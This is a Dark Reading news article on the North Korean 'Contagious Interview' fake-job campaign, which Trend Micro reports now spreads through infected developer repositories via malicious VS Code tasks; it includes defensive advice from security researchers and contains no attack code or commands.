DPRK Fake Job Scams Self-Propagate in 'Contagious Interview'

CYBERATTACKS & DATA BREACHES APPLICATION SECURITY ENDPOINT SECURITY REMOTE WORKFORCE NEWS DPRK Fake Job Scams Self-Propagate in 'Contagious Interview' A compromised developer's repository serves as a worm-like infection vector to spread remote access Trojans (RATs) and other malware. Elizabeth Montalbano,Contributing Writer April 22, 2026 5 Min Read SOURCE: IAN COWE VIA ALAMY STOCK PHOTO The infamous phony job-offer ploy by North Korean threat actors is evolving into a self-propagating machine that uses compromised developer projects to infect other code repositories and spread like wildfire through the software supply chain. The so-called "Contagious Interview" gambit that has been tracked for several years has now firmly moved beyond single-target social engineering attacks aimed at compromising organizations via the developer ecosystem: it is now a significant supply chain threat where a compromised developer's repository itself becomes a worm-like infection vector to spread remote access Trojans (RATs) and other malware, according to a report published this week by Trend Micro.  The latest manifestation of the campaign is by a North Korean actor tracked by Trend Micro as Void Dokkaebi, aka Famous Chollima, which uses fake job lures that target developers with "cryptocurrency wallet credentials, signing keys, and access to continuous integration/continuous delivery (CI/CD) pipelines and production infrastructure," Trend Micro senior threat researcher Lucas Silva wrote in the report. Related:Exploits Turn Windows Defender Into Attacker Tool Attackers use malicious Visual Studio (VS) Code tasks and injected code that can execute during normal development activity to spread malware through the software supply chain as well as steal credentials to crypto wallets and other secrets, according to the report. "When that compromised code reaches organizational or popular open-source repositories, contributors, forks, and downstream projects can also be exposed," he wrote. Moreover, the campaign uses blockchain infrastructure for payload staging — including Tron, Aptos, and Binance Smart Chain — which puts parts of its delivery infrastructure beyond traditional security takedowns, he said. Latest Wave of Infections LOADING... Void Dokkaebi systematically targets software developers by posing as recruiters from cryptocurrency and AI firms to lure developers into cloning and executing code repositories as part of a testing process during fake job interviews, according to Trend Micro. These ongoing campaigns abuse the trust that developers have in the common practice used by organizations to submit prospective candidates to a technical test during a job interview, Joshua Allman, staff tactical response analyst at security firm Huntress, tells Dark Reading. "Because they are targeting people looking for work, the attackers are likely to have a more engaged target and they can be incredibly precise with who they target," he says. This can lead to a downstream impact of thousands if they are successful at compromising a popular package/project, Allman observes. Related:Surge in Bomgar RMM Exploitation Demonstrates Supply Chain Risk Knowing this, North Korean attackers have abused this attack vector since at least 2023, and they've evolved their tactics to go well beyond that initial target. In March alone, Trend Micro identified more than 750 infected code repositories, more than 500 malicious VS Code task configurations, and 101 instances of the commit-tampering tool used by Void Dokkaebi. Repositories belonging to organizations such as data management company DataStax and Java application provider Neutralinojs, also were found to be carrying infection markers. Moreover, the infected VS code propagation follows the discovery in December of a similar Contagious-Interview style attack that created a malicious npm package factory that operates like a well-oiled machine. "Worm-Like Behavior" The VS code initial infection chain starts with a fabricated job interview where the victim is asked to clone a code repository — hosted either on GitHub, GitLab, or Bitbucket and appearing legitimate — and review or run it as part of a technical assessment, according to Trend Micro.  The delivery mechanism abuses VS Code's workspace task system so that when the victim opens the project in VS Code and accepts the workspace's trust prompt, the task executes without further interaction. Microsoft did not respond immediately to an email by Dark Reading today requesting comment on this abuse of VS Code. Related:Chinese APT Targets Indian Banks, Korean Policy Circles "In some cases, the task fetches the backdoor directly from a remote URL," Trend Micro's Silva wrote. "In others, it launches a font or image file bundled in the repository that contains the malicious payload, a different execution variant that achieves the same result." At this point, the attack compromises the targeted developer's ecosystem; however, the "worm-like behavior" doesn't start until the victim commits the code to GitHub, he noted.  When that happens, the .vscode folder becomes hidden by default, making the malicious code "an effective Trojan horse" that sends any developer who subsequently clones the repository and opens it in VS Code a trust prompt that, if accepted, repeats the cycle to create "a self-propagating chain" of infections, Silva wrote. "Each compromised developer seeds new repositories with the infection vector, and each new victim becomes a potential distributor," Silva wrote.  Software Developers on Alert Fortunately, there are a number of ways enterprise development teams and developers in the job-seeking process can avoid being compromised by campaigns like this one and inadvertently infecting the supply chain via downstream propagation.  Organizations should ensure that all development projects use a lock file for dependency management, verify the integrity of updates, and always have some form of active endpoint protection "for when something slips through the cracks," Allman tells Dark Reading. Prospective job seekers also should "think twice before installing" anything presented to them by a prospective employer and, when presented with a routine coding task, "run it in a separate virtual machine/container that does not have access to any of your credentials/tokens/secrets," he says. Trend Micro also made recommendations to developers to avoid being compromised, including treating any external repository, even during a hiring workflow, as untrusted; detecting unauthorized changes and anomalous commits to any repository they're working with; and limiting privileges and enforcing code-signing validation during the development process. About the Author Elizabeth Montalbano Contributing Writer Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking. Want more Dark Reading stories in your Google search results? ADD US NOW More Insights Industry Reports CISO Survey 2026: The State of Incident Response Readiness AI SOC for MDR: The Structural Evolution of Managed Detection and Response How Enterprises Are Developing Secure Applications KuppingerCole Business Application Risk Management Leadership Compass 2026 CISO AI Risk Report Access More Research Webinars Defending Against AI-Powered Attacks: The Evolution of Adversarial Machine Learning Zero Trust Architecture for Cloud environments: Implementation Roadmap Tips for Managing Cloud Security in a Hybrid Environment? Security in the AI Age Identity Maturity Under Pressure: 2026 Findings and How to Catch Up More Webinars You May Also Like CYBERATTACKS & DATA BREACHES Critical Fortinet Flaws Under Active Attack by Jai Vijayan, Contributing Writer DEC 17, 2025 CYBERATTACKS & DATA BREACHES F5 BIG-IP Environment Breached by Nation-State Actor by Alexander Culafi OCT 15, 2025 CYBERATTACKS & DATA BREACHES Jaguar Land Rover Shows Cyberattacks Mean (Bad) Business by Robert Lemos, Contributing Writer OCT 03, 2025 CYBERATTACKS & DATA BREACHES Researcher Says Patched Commvault Bug Still Exploitable by Jai Vijayan, Contributing Writer MAY 06, 2025 Editor's Choice VULNERABILITIES & THREATS EDR-Killer Ecosystem Expansion Requires Stronger BYOVD Defenses byRob Wright APR 14, 2026 8 MIN READ СLOUD SECURITY CSA: CISOs Should Prepare for Post-Mythos Exploit Storm byAlexander Culafi APR 13, 2026 6 MIN READ СLOUD SECURITY Navigating the Unique Security Risks of Asia's Digital Supply Chain byAlexander Culafi APR 15, 2026 3 MIN READ Want more Dark Reading stories in your Google search results? 2026 Security Trends & Outlooks THREAT INTELLIGENCE Cybersecurity Predictions for 2026: Navigating the Future of Digital Threats JAN 2, 2026 CYBER RISK Navigating Privacy and Cybersecurity Laws in 2026 Will Prove Difficult JAN 12, 2026 ENDPOINT SECURITY CISOs Face a Tighter Insurance Market in 2026 JAN 5, 2026 THREAT INTELLIGENCE 2026: The Year Agentic AI Becomes the Attack-Surface Poster Child JAN 30, 2026 Download the Collection LOADING... Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE Webinars Defending Against AI-Powered Attacks: The Evolution of Adversarial Machine Learning MON, MAY 11, 2026 AT 1:00PM ET Zero Trust Architecture for Cloud environments: Implementation Roadmap TUES, MAY 12, 2026 AT 1PM EST Tips for Managing Cloud Security in a Hybrid Environment? THURS, MAY 7, 2026 AT 1PM EST Security in the AI Age TUES, APRIL 28, 2026 AT 1PM EST Identity Maturity Under Pressure: 2026 Findings and How to Catch Up WED, MAY 6,2026 AT 1PM EST More Webinars BLACK HAT ASIA | MARINA BAY SANDS, SINGAPORE Experience cutting-edge cybersecurity insights in this four-day event featuring expert Briefings on the latest research, Arsenal tool demos, a vibrant Business Hall, networking opportunities, and more. Use code DARKREADING for a Free Business Pass or $200 off a Briefings Pass. GET YOUR PASS GISEC GLOBAL 2026 GISEC GLOBAL is the most influential and the largest cybersecurity gathering in the Middle East & Africa, uniting global CISOs, government leaders, technology buyers, and ethical hackers for three power-packed days of innovation, strategy, and live cyber drills. 📌 BOOK YOUR SPACE